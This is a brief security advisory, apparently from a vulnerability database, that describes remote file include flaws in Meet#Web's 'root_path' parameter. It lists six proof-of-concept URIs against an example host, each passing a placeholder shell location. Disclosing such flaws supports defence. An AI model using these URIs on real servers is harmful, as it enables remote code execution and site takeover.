|
|
Meet#Web 'root_path' Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/cms/meetweb/classes/modules.php?root_path=[SHell] http://www.example.com/cms/meetweb/classes/ManagerResource.class.php?root_path=[SHell] http://www.example.com/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=[SHell] http://www.example.com/cms/meetweb/classes/RegForm.class.php?root_path=[SHell] http://www.example.com/cms/meetweb/classes/RegResource.class.php?root_path=[SHell] http://www.example.com/cms/meetweb/classes/RegRightsResource.class.php?root_path=[SHell] |
|
Privacy Statement |